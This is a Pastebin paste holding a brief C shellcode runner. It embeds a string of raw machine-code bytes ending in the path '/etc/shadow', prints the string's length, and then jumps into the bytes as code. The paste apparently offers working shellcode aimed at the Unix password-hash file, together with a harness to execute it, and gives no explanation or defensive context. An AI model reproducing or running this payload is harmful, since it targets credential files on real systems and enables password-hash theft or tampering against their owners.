Advertisement
Guest User

Untitled

a guest
Sep 21st, 2017
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 0.33 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <string.h>
  3.  
  4. char *SC = "\x17\xe3\x4a\x24\x02\xc3\x0f\xe3\x05\xc7\x03"
  5.     "\x64\x57\xe8\x05\xe9\x87\x09\x1a\x05\x03\x75"
  6.     "\x02\xc3\x3a\x23\x01\xe3\x4a\x24\x02\xc3\x2f"
  7.     "\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77";
  8.  
  9. int main(void)
  10. {
  11.     fprintf(stdout,"Length: %d\n",strlen(SC));
  12.     (*(void(*)()) SC)();
  13. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement